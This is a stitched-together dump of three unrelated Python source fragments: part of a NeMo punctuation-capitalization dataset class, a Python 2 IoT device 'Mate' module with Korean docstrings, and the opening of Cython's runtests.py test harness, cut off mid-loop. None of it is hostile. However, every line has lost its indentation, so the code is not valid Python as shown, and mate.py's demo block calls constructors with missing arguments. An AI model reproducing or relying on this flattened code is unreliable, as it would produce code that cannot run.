Shuffle input sequences, sort them by number of tokens, pad, and pack into batches which satisfy following
conditions:
- total number of tokens in batch including paddings is less or equal to ``self.tokens_in_batch``
- batch size is evenly divisible by 8 (except for the last batch)
- seq length (elements of the third returned object) is evenly divisible by 8
Created batches are shuffled before returning.
If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then ``'segment_ids'``, ``'loss_mask'``, and
``'input_mask'`` are added to the batch.
If ``self.batch_building_progress_queue`` is not ``None``, then padding progress is reported to
``self.batch_building_progress_queue``. Otherwise, a new ``tqdm`` instance is created in ``pack_into_batches``
method.
Args:
input_ids: a list of 1D int32 arrays which contain token ids of dataset source
subtokens_mask: a list of 1D boolean arrays which elements are ``True`` if corresponding token is the
first token in some word
punct_labels: a list of 1D int32 arrays which contain encoded punctuation labels
capit_labels: a list of 1D int32 arrays which contain encoded capitalization labels
Returns:
a list of batches. Each batch is a dictionary with items:
- ``'input_ids'``: a ``np.int32`` numpy array;
- ``'subtokens_mask'``: a boolean numpy array;
- ``'punct_labels'``: a ``np.int32`` numpy array;
- ``'capit_labels'``: a ``np.int32`` numpy array.
If ``self.add_masks_and_segment_ids_to_batch`` is ``True``, then a batch also contain items
- ``'segment_ids'``: a ``np.int8`` numpy array;
- ``'input_mask'``: a boolean numpy array;
- ``'loss_mask'``: a boolean numpy array.
The values of a batch dictionary are numpy arrays of identical shape.
"""
zipped = list(zip(input_ids, subtokens_mask, punct_labels, capit_labels))
self.batch_shuffling_random_state.shuffle(zipped)
input_ids, subtokens_mask, punct_labels, capit_labels = zip(*sorted(zipped, key=lambda x: x[0].shape[0]))
batch_beginnings, batch_sizes, batch_seq_lengths = self._mark_up_batches(input_ids)
batches = []
if self.batch_building_progress_queue is None:
inp_iterator = tqdm(
zip(batch_beginnings, batch_sizes, batch_seq_lengths),
total=len(batch_beginnings),
desc="Batch building",
unit="batch",
)
else:
# In this case we report number of queries not number of batches
inp_iterator = zip(batch_beginnings, batch_sizes, batch_seq_lengths)
progress_made = 0
for start, size, length in inp_iterator:
batch_input_ids = pad(input_ids[start : start + size], length, self.tokenizer.pad_id)
batch_subtokens_mask = pad(subtokens_mask[start : start + size], length, False)
batch = {
"input_ids": batch_input_ids,
"subtokens_mask": batch_subtokens_mask,
"punct_labels": pad(
punct_labels[start : start + size], length, self.punct_label_ids[self.pad_label]
).astype(np.int64),
"capit_labels": pad(
capit_labels[start : start + size], length, self.capit_label_ids[self.pad_label]
).astype(np.int64),
}
if self.add_masks_and_segment_ids_to_batch:
batch_segment_ids, batch_input_mask, batch_loss_mask = create_masks_and_segment_ids(
batch_input_ids,
batch_subtokens_mask,
self.tokenizer.pad_id,
self.tokenizer.cls_id,
self.tokenizer.sep_id,
self.ignore_start_end,
self.ignore_extra_tokens,
)
batch['segment_ids'] = batch_segment_ids
batch['input_mask'] = batch_input_mask
batch['loss_mask'] = batch_loss_mask
batches.append(batch)
if self.batch_building_progress_queue is not None:
progress_made += size
if progress_made >= BATCH_BUILDING_PROGRESS_REPORT_PERIOD:
self.batch_building_progress_queue.put(progress_made)
progress_made = 0
if self.batch_building_progress_queue is not None:
self.batch_building_progress_queue.put(progress_made)
self.batch_shuffling_random_state.shuffle(batches)
return batches
def repack_batches_with_shuffle(self) -> None:
"""A function for proper shuffling of a dataset. Pytorch data loader shuffing will only permute batches."""
logging.info("Shuffling training dataset")
self.batches = self._pack_into_batches(
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels
)
def _calculate_and_save_label_frequencies(self, all_labels: List[np.ndarray], name: str) -> Dict[str, float]:
"""Calculates and saves labels frequencies in :attr:`label_info_save_dir`."""
merged_labels = itertools.chain.from_iterable(all_labels)
if self.verbose:
logging.info('Three most popular labels')
self.label_info_save_dir.mkdir(parents=True, exist_ok=True)
_, label_frequencies, _ = get_label_stats(
merged_labels, str(self.label_info_save_dir / f'label_count_{name}.tsv')
)
return label_frequencies
def save_labels_and_get_file_paths(
self, punct_labels_file_name: str, capit_labels_file_name: str
) -> Tuple[Path, Path]:
"""
Saves label ids into files located in ``self.label_info_save_dir``. Saved label ids are usually used for
``.nemo`` checkpoint creation.
The signatures of this method and the signature of the method
:meth:`~nemo.collections.nlp.data.token_classification.BertPunctuationCapitalizationTarredDataset.save_labels_and_get_file_paths`
must be identical.
Args:
punct_labels_file_name (:obj:`str`): a name of a punctuation labels file
capit_labels_file_name (:obj:`str`): a name of a capitalization labels file
Returns:
:obj:`Tuple[pathlib.Path, pathlib.Path]`: a tuple containing:
- :obj:`pathlib.Path`: a path to the saved punctuation labels file
- :obj:`pathlib.Path`: a path to the saved capitalization labels file
"""
nemo_dir = self.label_info_save_dir / LABEL_ID_DIR_FOR_NEMO_CHECKPOINT
punct_labels_file = nemo_dir / punct_labels_file_name
capit_labels_file = nemo_dir / capit_labels_file_name
save_label_ids(self.punct_label_ids, punct_labels_file)
save_label_ids(self.capit_label_ids, capit_labels_file)
return punct_labels_file, capit_labels_file
def __len__(self) -> int:
if self.use_features:
return len(self.batches)
return len(self.input_ids)
def collate_fn(self, batches: List[Dict[str, np.ndarray]]) -> Dict[str, torch.Tensor]:
"""
Return zeroth batch from ``batches`` list passed for collating and casts ``'segment_ids'``, ``'punct_labels'``,
``'capit_labels'`` to types supported by
:class:`~nemo.collections.nlp.models.token_classification.punctuation_capitalization_model.PunctuationCapitalizationModel`.
All output tensors have shape ``[Batch, Time]``.
.. warning::
A ``batch_size`` parameter of a PyTorch data loader and sampler has to be ``1``.
Args:
batches (:obj:`List[Dict[str, np.ndarray]]`): a list containing 1 batch passed for collating
Returns:
:obj:`Dict[str, torch.Tensor]`: a batch dictionary with following items (for detailed description of batch
items see method :meth:`__getitem__`):
- ``'input_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'subtokens_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'punct_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'capit_labels'`` (:obj:`torch.Tensor`): :obj:`torch.int64` tensor,
- ``'segment_ids'`` (:obj:`torch.Tensor`): :obj:`torch.int32` tensor,
- ``'input_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor,
- ``'loss_mask'`` (:obj:`torch.Tensor`): :obj:`torch.bool` tensor.
"""
batch = {k: torch.as_tensor(v) for k, v in batches[0].items()}
batch['segment_ids'] = batch['segment_ids'].int()
batch['punct_labels'] = batch['punct_labels'].long()
batch['capit_labels'] = batch['capit_labels'].long()
return batch
def __getitem__(self, idx: int) -> Dict[str, np.ndarray]:
"""
Return a batch with index ``idx``. The values of a batch dictionary are numpy arrays of identical shapes
``[Batch, Time]``. Labels are identical for all tokens in a word. For example, if
- word ``'Tokenization'`` is tokenized into tokens ``['token', 'ization']``,
- it is followed by comma,
then punctuation labels are ``[',', ',']`` and capitalization labels are ``['U', 'U']`` (``'U'`` is a label
for words which start with upper case character).
Args:
idx: an index of returned batch
Returns:
:obj:`Dict[str, np.ndarray]`: a dictionary with items:
- ``'input_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded tokens,
- ``'subtokens_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if they
correspond to first token in a word,
- ``'punct_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded punctuation
labels,
- ``'capit_labels'`` (:obj:`numpy.ndarray`): :obj:`numpy.int32` array containing encoded capitalization
labels.
- ``'segment_ids'`` (:obj:`numpy.ndarray`): :obj:`numpy.int8` array filled with zeros (BERT token types
in HuggingFace terminology) (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
items is missing),
- ``'input_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if corresponding
token is not a padding token (if ``self.add_masks_and_segment_ids_to_batch`` is ``False``, then this
items is missing),
- ``'loss_mask'`` (:obj:`numpy.ndarray`): :obj:`bool` array which elements are ``True`` if loss is
computed for corresponding token. See more in description of constructor parameters
``ignore_start_end``, ``ignore_extra_tokens`` (if ``self.add_masks_and_segment_ids_to_batch`` is
``False``, then this items is missing).
"""
if self.use_features:
return self.batches[idx]
return {'input_ids': self.input_ids[idx], 'subtokens_mask': self.subtokens_mask[idx],
'punct_labels': self.punct_labels[idx], 'capit_labels': self.capit_labels[idx]}
|
mate.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 JiNong, Inc.
# All right reserved.
#
"""
Base Mate를 정의함.
"""
import time
import util
import logging
import logging.handlers
import traceback
from calibration import Calibrator
from threading import Thread
from mblock import MBlock, BlkType
from enum import Enum
from devtype import DevType
from datetime import datetime
from dinfo import DevInfo
class Mate(object):
"""
Mate의 기본형을 정의함.
"""
def __init__(self, option, devinfo, coupleid, logger=None):
"""
Mate 의 Constructor. option과 devinfo를 주요 입력으로 함.
:param option: 작동을 위한 설정을 딕셔너리로 전달함
:param devinfo: 처리하는 장비의 아이디를 딕셔너리 형식으로 전달함. 다음과 같은 형식임.
id 는 장비의 아이디, dk 는 장비를 확인하기 위한 키값, dt는 장비의 타입, children은 하위 장비가 있는 경우에 하위 장비를 표현하기 위한 용도임.
devinfo : [
{"id" : "3", "dk" : "1", "dt": "nd", "children" : [
{"id" : "4", "dk" : "0", "dt": "sen"},
{"id" : "5", "dk" : "1", "dt": "sen"},
{"id" : "6", "dk" : "2", "dt": "act"},
{"id" : "7", "dk" : "3", "dt": "act/retractable/level0"}
]}
]
:param coupleid: 커플아이디.
:param logger: 로깅을 위한 로거. 없다면 내부적으로 만듬.
"""
self._option = option
print "mate initialized. ", option
self._coupleid = coupleid
self._sleep = {"time": 3, "obs": 19, "noti": 19} if "sleep" not in option else option["sleep"]
self._devinfo = DevInfo(devinfo)
self._writecb = None
self._executing = False
self._connected = False
self._msgq = None
if "backup" in option and "prefix" in option["backup"]:
self._backup = True
else:
self._backup = False
if logger is None:
self._logger = util.getdefaultlogger()
else:
self._logger = logger
self._calibrator = Calibrator(option, self._logger)
def __repr__(self):
return "{}({},{})".format(self.__class__.__name__, str(self._option), str(self._devinfo))
def start(self, _writecb):
""" Mate가 시작할때 호출됨 """
self._executing = True
self._writecb = _writecb
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
self._executing = False
return True
def connect(self):
self._connected = True
return True
def close(self):
self._connected = False
def getvalue(self, k, v):
"""
센서값을계산할때 사용함
Calibrator 를 사용하며, 설정이 없는 경우 raw 값을 돌려줌
"""
return self._calibrator.calculate(k, v)
def isexecuting(self):
""" Mate가 작동중인지를 확인함 """
return self._executing
def isconnected(self):
""" Mate가 연결되어 있는지를 확인함 """
return self._connected
def writeblk(self, blk):
""" 외부에서 데이터 전달을 위해 호출되는 메소드. """
# external callback
print "###message : ", blk.get()
def readmsg(self):
""" Mate가 메세지를 읽는 함수. 직접구현해야함. """
self._msgq = [MBlock(0, BlkType.NONE, None)]
def backup(self, blk):
fname = "backup/" + self._option["backup"]["prefix"] + "-" + datetime.now().strftime("%Y%d%m") + ".bak"
with open(fname, "a") as fp:
fp.write(blk.stringify() + "\n")
def writecb(self, blk):
self._writecb(blk)
# backup
if self._backup:
self.backup(blk)
def sendobs(self):
""" 관측치를 전송한다. writecb를 사용함. """
pass
def sendnoti(self):
""" 노티를 전송한다. writecb를 사용함. """
pass
def run(self):
print "mate run ... sleep : ", self._sleep["time"]
scnt = 0
while self.isexecuting():
try:
while self.isexecuting() == True and self.isconnected() == False:
if self.connect() == False:
self._logger.info("sleep 10 seconds and try to connect")
time.sleep(10)
else:
self._logger.info("reconnected!!")
if self.isexecuting() == False:
break
time.sleep(self._sleep["time"])
self.readmsg()
if scnt % self._sleep["obs"] == 0:
self.sendobs()
if scnt % self._sleep["noti"] == 0:
self.sendnoti()
scnt = scnt + 1
except Exception as ex:
self._logger.warn("There is an exception : " + str(ex))
self._logger.warn(str(traceback.format_exc()))
try:
self.close()
except:
pass
print "mate stop"
class ThreadMate(Mate):
def __init__(self, option, devinfo, coupleid, logger=None):
super(ThreadMate, self).__init__(option, devinfo, coupleid, logger)
self._logger.info("Mate Started.")
def start(self, _writecb):
"""
Mate가 시작할때 호출
:param writecb: 다른 메이트의 콜백메소드
"""
super(ThreadMate, self).start(_writecb)
self._thd = Thread(target=self.run)
self._thd.start()
return True
def stop(self):
""" Mate가 중지될때 호출됨 """
super(ThreadMate, self).stop()
self._thd.join()
return True
if __name__ == "__main__":
mate = ThreadMate({}, [])
mate2 = Mate({}, [])
mate2
mate.start(mate2.writeblk)
print "mate started"
time.sleep(3)
mate.stop()
print "mate stopped"
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
from collections import defaultdict
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro and getattr(numpy, '__version__', '') not in ('1.19.0', '1.19.1'):
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_gdb_extension(ext, _has_gdb=[None]):
# We should probably also check for Python support.
if not include_debugger:
_has_gdb[0] = False
if _has_gdb[0] is None:
try:
subprocess.check_call(["gdb", "--version"])
except (IOError, subprocess.CalledProcessError):
_has_gdb[0] = False
else:
_has_gdb[0] = True
if not _has_gdb[0]:
return EXCLUDE_EXT
return ext
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
from distutils import ccompiler
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:gdb': update_gdb_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
'tag:py3only': exclude_extension_in_pyver((2, 7)),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
'run.time_pxd', # _PyTime_GetSystemClock doesn't exist in 3.4
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
CDEFS = []
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x)) # needs lambda to set function attribute
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items(), key=operator.itemgetter(1), reverse=True):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.doctest_selector = re.compile(options.only_pattern).search if options.only_pattern else None
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
# TODO: parallelise I/O with a thread pool for the different directories once we drop Py2 support
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if (sys.platform not in ['win32'] and self.add_embedded_test
# the embedding test is currently broken in Py3.8+, except on Linux.
and (sys.version_info < (3, 8) or sys.platform != 'darwin')):
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
